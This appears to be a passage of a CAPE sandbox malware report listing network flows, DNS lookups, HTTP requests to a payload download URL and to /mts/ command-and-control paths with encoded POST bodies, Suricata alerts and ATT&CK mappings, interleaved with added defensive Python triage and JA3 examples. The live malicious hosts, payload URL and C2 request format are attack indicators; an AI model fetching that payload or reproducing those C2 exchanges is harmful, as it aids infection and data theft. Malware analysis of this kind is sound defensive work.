192.168.1.7 13652 63.250.37.110 www.vinoblay.com 25145
192.168.1.7 16761 63.250.37.110 www.vinoblay.com 23152
192.168.1.7 24403 63.250.37.110 www.vinoblay.com 21809
192.168.1.7 13672 63.250.37.110 www.vinoblay.com 27501
192.168.1.7 30017 63.250.37.110 www.vinoblay.com 24391
192.168.1.7 18257 63.250.37.110 www.vinoblay.com 25924
192.168.1.7 27237 63.250.37.110 www.vinoblay.com 25974
192.168.1.7 26993 63.250.37.110 www.vinoblay.com 28214
192.168.1.7 18482 63.250.37.110 www.vinoblay.com 28994
192.168.1.7 24943 63.250.37.110 www.vinoblay.com 16743
192.168.1.7 23160 63.250.37.110 www.vinoblay.com 17464
192.168.1.7 25671 63.250.37.110 www.vinoblay.com 26742
192.168.1.7 29266 63.250.37.110 www.vinoblay.com 18787
192.168.1.7 13168 63.250.37.110 www.vinoblay.com 25142
192.168.1.7 26964 63.250.37.110 www.vinoblay.com 27725
192.168.1.7 25957 63.250.37.110 www.vinoblay.com 18558
192.168.1.7 25686 63.250.37.110 www.vinoblay.com 13171
192.168.1.7 19529 63.250.37.110 www.vinoblay.com 18277
192.168.1.7 12642 63.250.37.110 www.vinoblay.com 19053
192.168.1.7 19020 63.250.37.110 www.vinoblay.com 22129
192.168.1.7 20606 63.250.37.110 www.vinoblay.com 27715
192.168.1.7 17458 63.250.37.110 www.vinoblay.com 22329
192.168.1.7 26692 63.250.37.110 www.vinoblay.com 27006
192.168.1.7 12644 63.250.37.110 www.vinoblay.com 12887
192.168.1.7 22869 63.250.37.110 www.vinoblay.com 19304
192.168.1.7 25935 63.250.37.110 www.vinoblay.com 27467
192.168.1.7 26969 63.250.37.110 www.vinoblay.com 11577
192.168.1.7 16718 63.250.37.110 www.vinoblay.com 26441
192.168.1.7 16973 63.250.37.110 www.vinoblay.com 13421
192.168.1.7 12889 63.250.37.110 www.vinoblay.com 21360
192.168.1.7 28757 63.250.37.110 www.vinoblay.com 22581
192.168.1.7 26932 63.250.37.110 www.vinoblay.com 20585
192.168.1.7 13637 63.250.37.110 www.vinoblay.com 19012
192.168.1.7 30037 63.250.37.110 www.vinoblay.com 28798
192.168.1.7 49193 63.250.37.110 www.vinoblay.com 80
192.168.1.7 49194 63.250.37.110 www.vinoblay.com 80
192.168.1.7 49188 67.217.34.88 amuhapps.com 80
192.168.1.7 49191 95.101.78.106 80
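The TCP table above lists dozens of flows to 188.165.53.185 and 63.250.37.110 on non-standard destination ports from low-numbered source ports, next to a few ordinary port-80 connections to the same hosts. The Python below is an added triage example, not part of this CAPE report or of CAPE itself: it parses rows in the table's own layout, aggregates flows per destination, and separates the plain port-80/443 connections from rows whose port pairs look unusual. The sample rows are a constructed subset of the table; the 49152-65535 range used to judge source ports is the default Windows dynamic port range on Vista and later, applied here as a heuristic (it is an assumption that the analysis VM uses the default), and rows it flags should be checked against the pcap rather than treated as confirmed C2.

```python
# Constructed sample: a subset of rows from the TCP table above, in the
# table's own layout (source, source port, destination, optional hostname,
# destination port).
SAMPLE_TCP = """\
192.168.1.7 49174 13.107.42.23 443
192.168.1.7 16978 188.165.53.185 www.esprit-de-connaisseur.com 30290
192.168.1.7 14421 188.165.53.185 www.esprit-de-connaisseur.com 18545
192.168.1.7 20037 188.165.53.185 www.esprit-de-connaisseur.com 22631
192.168.1.7 49195 188.165.53.185 www.esprit-de-connaisseur.com 80
192.168.1.7 49196 188.165.53.185 www.esprit-de-connaisseur.com 80
192.168.1.7 49189 23.20.239.12 www.parkwayautogroup.com 80
192.168.1.7 44973 52.114.133.61 7277
192.168.1.7 30029 63.250.37.110 www.vinoblay.com 12634
192.168.1.7 24954 63.250.37.110 www.vinoblay.com 17232
192.168.1.7 49193 63.250.37.110 www.vinoblay.com 80
192.168.1.7 49188 67.217.34.88 amuhapps.com 80
192.168.1.7 49191 95.101.78.106 80
"""

STANDARD_PORTS = {80, 443}
# Default Windows dynamic (ephemeral) port range on Vista and later;
# assumption: the analysis VM keeps that default.
EPHEMERAL_MIN = 49152


def parse_flows(text):
    """Turn table rows into dicts; rows that fit neither layout are skipped."""
    flows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 4:
            src, sport, dst, dport = fields
            host = ""
        elif len(fields) == 5:
            src, sport, dst, host, dport = fields
        else:
            continue
        if not (sport.isdigit() and dport.isdigit()):
            continue
        flows.append({"src": src, "sport": int(sport), "dst": dst,
                      "host": host, "dport": int(dport)})
    return flows


def is_unusual(flow):
    """Heuristic: a normal client connection uses an ephemeral source port
    and, for the web traffic seen in this report, a standard destination port."""
    return flow["dport"] not in STANDARD_PORTS or flow["sport"] < EPHEMERAL_MIN


def summarize(flows):
    """Per destination IP: hostname, flow count, distinct destination ports,
    and how many flows the heuristic flags."""
    by_dst = {}
    for f in flows:
        d = by_dst.setdefault(f["dst"], {"host": "", "flows": 0,
                                         "dports": set(), "odd_flows": 0})
        d["host"] = d["host"] or f["host"]
        d["flows"] += 1
        d["dports"].add(f["dport"])
        d["odd_flows"] += int(is_unusual(f))
    return by_dst


def triage_order(summary):
    """Destinations with the most flagged flows first, then by total flows."""
    return sorted(summary, key=lambda ip: (-summary[ip]["odd_flows"],
                                           -summary[ip]["flows"], ip))


if __name__ == "__main__":
    s = summarize(parse_flows(SAMPLE_TCP))
    for ip in triage_order(s):
        d = s[ip]
        print(f"{ip:16} {d['host'] or '-':32} flows={d['flows']:3} "
              f"ports={len(d['dports']):3} flagged={d['odd_flows']}")
```

Run against the full table, the two /mts/ hosts come out on top because of the many non-standard port pairs, while amuhapps.com (one port-80 flow, the .bin download) and the Microsoft endpoints rank as ordinary traffic.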

UDP

Source Source Port Destination Destination Port
192.168.1.7 137 192.168.1.255 137
192.168.1.7 53011 8.8.8.8 53
192.168.1.7 53423 8.8.8.8 53
192.168.1.7 54277 8.8.8.8 53
192.168.1.7 55169 8.8.8.8 53
192.168.1.7 56221 8.8.8.8 53
192.168.1.7 56328 8.8.8.8 53
192.168.1.7 56943 8.8.8.8 53
192.168.1.7 57251 8.8.8.8 53
192.168.1.7 59227 8.8.8.8 53
192.168.1.7 59353 8.8.8.8 53
192.168.1.7 59810 8.8.8.8 53
192.168.1.7 61313 8.8.8.8 53
192.168.1.7 62371 8.8.8.8 53
192.168.1.7 64247 8.8.8.8 53
192.168.1.7 65103 8.8.8.8 53
192.168.1.7 65119 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
amuhapps.com [VT] A 67.217.34.88 [VT] 67.217.34.88 [VT]
www.parkwayautogroup.com [VT] A 23.20.239.12 [VT] 23.20.239.12 [VT]
www.aroundthehearth.net [VT] NXDOMAIN
www.vinoblay.com [VT] A 63.250.37.110 [VT] 63.250.37.110 [VT]
www.esprit-de-connaisseur.com [VT] A 188.165.53.185 [VT] 188.165.53.185 [VT]
www.cp75788.com [VT]
www.eskenaskhareji.com [VT]
www.hissexualhealth.com [VT]
www.electriciandearbornmi.com [VT]

HTTP Requests

URI Data
http://amuhapps.com/a1/bin_WHDqrJTtDa208.bin
GET /a1/bin_WHDqrJTtDa208.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: amuhapps.com
Cache-Control: no-cache

http://www.parkwayautogroup.com/mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN
GET /mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.parkwayautogroup.com
Connection: close

http://www.vinoblay.com/mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN
GET /mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.vinoblay.com
Connection: close

http://www.vinoblay.com/mts/
POST /mts/ HTTP/1.1
Host: www.vinoblay.com
Connection: close
Content-Length: 81915
Cache-Control: no-cache
Origin: http://www.vinoblay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.vinoblay.com/mts/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

OVolp=FGrNNWl_uSK7VBXFW0UNOlWrUifMdLoRZH3lFJ(jnt2C5qKkUQDdpOxMDywjLO54cNDjQ6qy2eaGo0Zqd2MVIgEK1qMZriV_JBNmp3m-yulQPSABiW5jFKutoWcjDxPdDr~-WnytiP8aqmqCszsJhj0xkKjwpU8TRHNS7BUL4VtNZGGAss81RgO4E8cCrpqXpw4JbWx5bo0TEPTs0f(jeD3habfTXP01U7M51doTSKjLj6VEOqhUfksbSThoj0AbROodM8S_p5SjUUYZmN4GQ0tj3O2jjH(yDbsTqUA6cHqIujzAaA8rInCJ4uYWbxMgeD3FFqRlb1hLeFW0Wc~GxPB3Wu~wOzdZAvY4KveKxQ9AJp~TP8UzJaiG6AQyE8NLBnAmKG9d03GRGTWmMIBYKeVxMOhpxpxU4famY16-kbUhH-U6Ga7Sw-gKm5MncEYsyhPkWocUVt6WXYpaOUFwA14IdhWMuunpSq9PySYvulHsrLW6Kul5ff7yfSHKxMGOp6ZuSs(uHbtXKMR3Hk6i6QZQnSLecBWvRzX9z0M_~m9UXyBl0Cw2nnTxaixTkhGAx0LXvSbqn1mJXIY_g4mmowFFE35bxOCq3KBxlj01tQD9wLvkRintlAAEJ8KdcLP-TXEAiXjwh-Q4mflAaNyxtMpcgrownSn0RaoM9WA71drYXN5TBLLyAaCNDUbbEksuq9vLxs4tRHNOSrvI38o6x3xJyeqitYn9tHrOGrnmBg1OR5SvYeVqorul7dBOBnntVmbFv7brcjMBrTyIseMw47eDNXKEtqRVfvjQoutzCrXxuQkeMqB_m6QCLwPJMe1hFxS2NUxQHrPYPPHOEUHifzE5CwoKmhfY3Sz-7f1ljrV5rhlqvlJVynaWI2jBrGMboHhPfVvD8cBci4AzUuNem0Lwjq26Z0pLS9(RbnKXvb2etlL6gpluNqaLdKClibLY5lgqBShdPH~AdI0MNGIqG30YpcdeeraX2DMC(_sK2TzofxC6Xa2gnRUu1cxxDKZOV9Z9VzP-(3kMELk
http://www.esprit-de-connaisseur.com/mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN
GET /mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.esprit-de-connaisseur.com
Connection: close

http://www.esprit-de-connaisseur.com/mts/
POST /mts/ HTTP/1.1
Host: www.esprit-de-connaisseur.com
Connection: close
Content-Length: 81915
Cache-Control: no-cache
Origin: http://www.esprit-de-connaisseur.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.esprit-de-connaisseur.com/mts/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

OVolp=MK8LkMyYpeOLXc4M5TTjwOzR0NS8RfIi5QJiAPMV1fF1t71ZhiyRXa3us4hnPWoACVdoYIIXkCZqmPyhwXC1vr80R81lNpz4w7GJx0JIi0hLDMQutSyRucH9hlPf9zM6CPfPvk(4KgYKW2q1m_NLzlAcZmx65fNNaEBr(Ye56rw75FG6S6qEmyXOScCXkwCStFzvpRKksLoUHr2A9WJrit0HjDmv3t0QcFN_zo0LYlHiR3qu~VSoiwgrd0Q0gVL2cX7KViNC7ocs7WuWZFDnx_s1by4mOrJ4sndhemREI1gnHLJvmcKNcv181GJ5mQLE8kf4OcblZ6rzXoo7eHgxog8L(srLlfyWhCrcgQp2ZF2WEFVHTVFCh49krZqRQGFIlfLXEsKAfFX8URPUIB1xAOZfRykv4FxTYeey42Y3lAgiGRhtYHdSCxIgOPCwixHA3ulrEqknijzGIdijDr0QyMJXKLPwKYDTLVhKyghJNPaWOWpIf_bfpByeMhfPRo~e4DlrAAfASpAiioi_uSMN~-clIL~DVv9Yi6uMzQr9vm3Ff9fh6jCH0AAAKs9TvIRzBTN7WunUSDiwpmIyQlGjI6OLUeuOm1lTB6pY0ZSxnI6vnxim4Rz_7HEI6Ljr4W3BSKfSvUO9kNjqy_5xb4s6uIo-T7bkRK(beYgEEv~VJp0BpVo1TahL(a~0JuPSB-RAQnIeaCHGq_p2KHlTqVx6EGEx9fFaN4yIbFqTVYn3FWoSWl701VtieufjSTQ218iZsucZvcqIgZok(mhqOha73wkLS2~1jv9Hi6hMgIyhqolfb2eVsAvJPt7eWWgX5K2_PkqhtImHkb0fWENUESsKhdoU25OhlEdwz9VHANrpH2dfd8sErE19Bt351G3enKZyW2AZQGi6XEWtV2IZ3hd8AzglUgWTYTOPrVw7615YRiEFzoHr6r6uMvaMc5nWdA2ApuuvJCZmpwmORSACTMvm8wVCGKpd6YfyyrT8USAk
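The requests above share one shape across three unrelated-looking hosts: a GET to /mts/ with parameters OVolp and lhv4 (lhv4 carries the same value H0DTRf2P8tY0iN every time), followed on two of the hosts by a large form-encoded POST to /mts/ carrying only OVolp, sent with an Internet Explorer Trident User-Agent. The Python below is an added example, not code from this report or from CAPE: it parses request blocks in the layout shown, groups them by path and parameter names, and reports paths that recur across several hosts with the same parameter set, listing any parameter whose value never changes. The embedded sample is a constructed, shortened copy of the requests above (parameter values and POST bodies truncated); the two-host threshold and the grouping key are this example's choices.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: a shortened copy of the request blocks in the report
# above (hosts, paths, parameter names and User-Agent strings are the
# report's; parameter values and POST bodies are truncated).
SAMPLE_REQUESTS = """\
GET /a1/bin_WHDqrJTtDa208.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: amuhapps.com
Cache-Control: no-cache

GET /mts/?OVolp=dJC7qAZce2ug3U8GWKjW&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.parkwayautogroup.com
Connection: close

GET /mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNg&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.vinoblay.com
Connection: close

POST /mts/ HTTP/1.1
Host: www.vinoblay.com
Connection: close
Content-Length: 81915
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko

OVolp=FGrNNWl_uSK7VBXFW0UNOlWrUifM

GET /mts/?OVolp=Eowx6rOx5ZT8Kc016FqZ&lhv4=H0DTRf2P8tY0iN HTTP/1.1
Host: www.esprit-de-connaisseur.com
Connection: close

POST /mts/ HTTP/1.1
Host: www.esprit-de-connaisseur.com
Connection: close
Content-Length: 81915
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko

OVolp=MK8LkMyYpeOLXc4M5TTjwOzR0NS8
"""

REQUEST_LINE = re.compile(r"^(GET|POST|HEAD|PUT) (\S+) HTTP/1\.[01]$")


def parse_requests(text):
    """Split a dump of request blocks into dicts with method, host, path,
    merged query/body parameters and User-Agent."""
    raw, cur = [], None
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if m:
            cur = {"method": m.group(1), "target": m.group(2),
                   "headers": {}, "body": [], "in_body": False}
            raw.append(cur)
        elif cur is None:
            continue
        elif cur["in_body"]:
            cur["body"].append(line)
        elif line == "":
            cur["in_body"] = True  # blank line ends the header block
        elif ":" in line:
            name, value = line.split(":", 1)
            cur["headers"][name.strip().lower()] = value.strip()
    reqs = []
    for r in raw:
        url = urlsplit(r["target"])
        params = dict(parse_qsl(url.query, keep_blank_values=True))
        ctype = r["headers"].get("content-type", "")
        if r["method"] == "POST" and ctype.startswith("application/x-www-form-urlencoded"):
            params.update(parse_qsl("".join(r["body"]).strip(), keep_blank_values=True))
        reqs.append({"method": r["method"], "host": r["headers"].get("host", ""),
                     "path": url.path, "params": params,
                     "ua": r["headers"].get("user-agent", "")})
    return reqs


def find_shared_paths(reqs, min_hosts=2):
    """Group requests by (path, parameter names) and report groups seen on
    at least `min_hosts` distinct hosts; note any parameter whose value is
    identical in every request of the group."""
    groups = defaultdict(list)
    for r in reqs:
        groups[(r["path"], tuple(sorted(r["params"])))].append(r)
    findings = []
    for (path, names), rs in groups.items():
        hosts = sorted({r["host"] for r in rs})
        if len(hosts) < min_hosts:
            continue
        constant = {}
        for n in names:
            values = {r["params"][n] for r in rs}
            if len(values) == 1:
                constant[n] = values.pop()
        findings.append({"path": path, "params": list(names), "hosts": hosts,
                         "methods": sorted({r["method"] for r in rs}),
                         "user_agents": sorted({r["ua"] for r in rs if r["ua"]}),
                         "constant_params": constant})
    return findings


if __name__ == "__main__":
    for f in find_shared_paths(parse_requests(SAMPLE_REQUESTS)):
        print(f"{f['path']} {f['methods']} params={f['params']} "
              f"hosts={f['hosts']} constant={f['constant_params']}")
```

On the sample this yields two groups, the GET with (OVolp, lhv4) on all three /mts/ hosts with lhv4 constant, and the POST with OVolp alone on two of them; the one-off download of /a1/bin_WHDqrJTtDa208.bin from amuhapps.com is not grouped with them. The constant value and the shared path are the parts worth turning into a proxy or IDS rule, since the OVolp payload changes on every request.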

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-05 14:12:57.865 192.168.1.7 [VT] 49173 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:57.991 192.168.1.7 [VT] 49174 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:58.026 192.168.1.7 [VT] 49175 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:58.114 192.168.1.7 [VT] 49176 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:58.249 192.168.1.7 [VT] 49177 13.107.42.23 [VT] 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-05 14:12:57.978 192.168.1.7 [VT] 49173 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.004 192.168.1.7 [VT] 49174 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.293 192.168.1.7 [VT] 49175 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.298 192.168.1.7 [VT] 49176 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:12:58.334 192.168.1.7 [VT] 49177 13.107.42.23 [VT] 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:13:58.151 192.168.1.7 [VT] 49190 52.114.133.61 [VT] 443 CN=*.events.data.microsoft.com 1a:c2:39:ff:84:fe:1a:c9:81:f5:45:9a:d0:a0:f2:66:d1:8c:38:c9 TLS 1.2

Suricata HTTP

Timestamp Source IP Source Port Destination IP Destination Port Method Status Hostname URI Content Type User Agent Referrer Length
2020-06-05 14:13:17.834 192.168.1.7 [VT] 49188 67.217.34.88 [VT] 80 200 amuhapps.com [VT] /a1/bin_WHDqrJTtDa208.bin application/octet-stream Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko None 183360
2020-06-05 14:13:52.488 192.168.1.7 [VT] 49189 23.20.239.12 [VT] 80 None www.parkwayautogroup.com [VT] /mts/?OVolp=dJC7qAZce2ug3U8GWKjWyJsQhcgydeghdBU/9ylRi86kip+Jtmb5eRwP3b+D8a46&lhv4=H0DTRf2P8tY0iN None None None 0
2020-06-05 14:13:59.794 192.168.1.7 [VT] 49191 95.101.78.106 [VT] 80 200 ctldl.windowsupdate.com [VT] /msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?086df30af318f8f6 application/vnd.ms-cab-compressed Microsoft-CryptoAPI/6.1 None 6894
2020-06-05 14:14:00.836 192.168.1.7 [VT] 49192 93.184.220.29 [VT] 80 200 ocsp.digicert.com [VT] /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D application/ocsp-response Microsoft-CryptoAPI/6.1 None 1507
2020-06-05 14:14:37.715 192.168.1.7 [VT] 49193 63.250.37.110 [VT] 80 404 www.vinoblay.com [VT] /mts/?OVolp=Nkn3Tx1S4BCqOmLXVzNgeiCRdxH+RKQ1MBq3Brf9r9O64pHDbGWQye08Q1cyBpd2&lhv4=H0DTRf2P8tY0iN text/html None None 327
2020-06-05 14:14:40.209 192.168.1.7 [VT] 49194 63.250.37.110 [VT] 80 None www.vinoblay.com [VT] /mts/ None Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://www.vinoblay.com/mts/ 0
2020-06-05 14:14:57.629 192.168.1.7 [VT] 49195 188.165.53.185 [VT] 80 None www.esprit-de-connaisseur.com [VT] /mts/?OVolp=Eowx6rOx5ZT8Kc016FqZyZ3liYvuYMMnhwUnLKcqlNFGtZIsjnDoIJzI/txoB1MC&lhv4=H0DTRf2P8tY0iN None None None 0
2020-06-05 14:14:59.637 192.168.1.7 [VT] 49196 188.165.53.185 [VT] 80 None www.esprit-de-connaisseur.com [VT] /mts/ None Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko http://www.esprit-de-connaisseur.com/mts/ 0
Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.1.7 49173 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49174 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49175 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49176 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49177 13.107.42.23 443 1074895078955b2db60423ed2bf8ac23 unknown
192.168.1.7 49190 52.114.133.61 443 d124ae14809abde3528a479fe01a12bd unknown
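JA3 fingerprints the TLS ClientHello: the client version, cipher suites, extension types, supported groups and EC point formats are written as decimal values joined with '-', the five fields joined with ',', GREASE values dropped, and the MD5 of that string is the hash shown in the table above and matched by the "ET JA3 Hash" Suricata alerts. In this report the only TLS sessions are to edge.skype.com and *.events.data.microsoft.com, while the /mts/ requests are plaintext HTTP on port 80, so those alerts describe the TLS client behind the Skype connections rather than any of the sample's /mts/ traffic. The Python below is an added example, not CAPE's or Suricata's implementation: it builds a ClientHello from chosen values (the SNI edge.skype.com is taken from the TLS table; cipher, group and extension values are this example's choices) and derives the JA3 string and hash from the raw bytes, including the GREASE filtering edge case.

```python
import hashlib
import struct

# GREASE values (RFC 8701) are excluded from JA3 so that clients that
# randomise them still hash consistently.
GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}


def build_client_hello(version, ciphers, extensions):
    """Return a TLS record (type 0x16) carrying a ClientHello.
    `extensions` is a list of (type, body) tuples in wire order."""
    body = struct.pack("!H", version) + b"\x11" * 32 + b"\x00"  # version, random, empty session id
    body += struct.pack("!H", 2 * len(ciphers)) + b"".join(struct.pack("!H", c) for c in ciphers)
    body += b"\x01\x00"  # one compression method: null
    ext = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack("!H", len(ext)) + ext
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body  # ClientHello + 24-bit length
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake


def ja3_from_client_hello(rec):
    """Parse a ClientHello record and return (ja3_string, ja3_md5)."""
    if len(rec) < 9 or rec[0] != 0x16 or rec[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    p = 9  # past the 5-byte record header and 4-byte handshake header
    (version,) = struct.unpack_from("!H", rec, p); p += 2
    p += 32            # client random
    p += 1 + rec[p]    # session id
    (cs_len,) = struct.unpack_from("!H", rec, p); p += 2
    ciphers = [struct.unpack_from("!H", rec, p + i)[0] for i in range(0, cs_len, 2)]
    p += cs_len
    p += 1 + rec[p]    # compression methods
    ext_types, groups, formats = [], [], []
    if p + 2 <= len(rec):  # extensions block is optional
        (ext_len,) = struct.unpack_from("!H", rec, p); p += 2
        end = p + ext_len
        while p + 4 <= end:
            et, el = struct.unpack_from("!HH", rec, p); p += 4
            data = rec[p:p + el]; p += el
            ext_types.append(et)
            if et == 0x000a:    # supported_groups: 2-byte list length, then 2-byte ids
                (n,) = struct.unpack_from("!H", data, 0)
                groups = [struct.unpack_from("!H", data, 2 + i)[0] for i in range(0, n, 2)]
            elif et == 0x000b:  # ec_point_formats: 1-byte list length, then 1-byte ids
                formats = list(data[1:1 + data[0]])

    def field(vals):
        return "-".join(str(v) for v in vals if v not in GREASE)

    ja3 = ",".join([str(version), field(ciphers), field(ext_types),
                    field(groups), field(formats)])
    return ja3, hashlib.md5(ja3.encode()).hexdigest()


def sni(name):
    """server_name extension body with a single host_name entry."""
    entry = b"\x00" + struct.pack("!H", len(name)) + name
    return struct.pack("!H", len(entry)) + entry


# Constructed sample: values chosen for this example; the SNI is the
# subject seen in the Suricata TLS table above.
SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x0a0a, 0x1301, 0x1302, 0xc02b, 0xc02f],     # leading GREASE cipher must be dropped
    [
        (0x0a0a, b""),                               # GREASE extension, also dropped
        (0x0000, sni(b"edge.skype.com")),            # server_name
        (0x000a, b"\x00\x04\x00\x1d\x00\x17"),       # supported_groups: x25519, secp256r1
        (0x000b, b"\x01\x00"),                       # ec_point_formats: uncompressed
        (0x000d, b"\x00\x04\x04\x03\x08\x04"),       # signature_algorithms
    ],
)


def sample_ja3():
    return ja3_from_client_hello(SAMPLE_HELLO)


if __name__ == "__main__":
    s, h = sample_ja3()
    print(s)
    print(h)
```

Because the hash covers only ClientHello fields, every process that uses the same TLS library with the same defaults produces the same JA3, which is why a rule keyed on a single hash can fire on unrelated software and why the "unknown" description next to these hashes is not itself evidence about the sample.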
Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.
Defense Evasion
  • T1116 - Code Signing
    • Signature - invalid_authenticode_signature
  • T1055 - Process Injection
    • Signature - InjectionInterProcess
Privilege Escalation
  • T1055 - Process Injection
    • Signature - InjectionInterProcess

    Processing ( 9.596 seconds )

    • 5.206 Suricata
    • 2.476 NetworkAnalysis
    • 1.047 VirusTotal
    • 0.518 CAPE
    • 0.136 BehaviorAnalysis
    • 0.135 Static
    • 0.03 Deduplicate
    • 0.02 AnalysisInfo
    • 0.012 TargetInfo
    • 0.005 Debug
    • 0.004 Dropped
    • 0.004 peid
    • 0.003 Strings

    Signatures ( 0.218 seconds )

    • 0.044 antiav_detectreg
    • 0.017 infostealer_ftp
    • 0.016 territorial_disputes_sigs
    • 0.012 ransomware_files
    • 0.01 infostealer_im
    • 0.009 antianalysis_detectreg
    • 0.008 ransomware_extensions
    • 0.007 network_cnc_http
    • 0.006 antiav_detectfile
    • 0.005 antidbg_windows
    • 0.005 persistence_autorun
    • 0.005 antivm_vbox_keys
    • 0.005 infostealer_mail
    • 0.004 antianalysis_detectfile
    • 0.004 modify_proxy
    • 0.004 infostealer_bitcoin
    • 0.003 api_spamming
    • 0.003 decoy_document
    • 0.003 antivm_vmware_keys
    • 0.003 masquerade_process_name
    • 0.003 network_torgateway
    • 0.002 kibex_behavior
    • 0.002 NewtWire Behavior
    • 0.002 antivm_parallels_keys
    • 0.002 antivm_vbox_files
    • 0.002 antivm_xen_keys
    • 0.002 geodo_banking_trojan
    • 0.002 browser_security
    • 0.002 disables_browser_warn
    • 0.002 network_dns_opennic
    • 0.002 network_http
    • 0.002 recon_checkip
    • 0.001 InjectionCreateRemoteThread
    • 0.001 antiemu_wine_func
    • 0.001 antivm_generic_disk
    • 0.001 antivm_vbox_libs
    • 0.001 betabot_behavior
    • 0.001 dynamic_function_loading
    • 0.001 exec_crash
    • 0.001 hawkeye_behavior
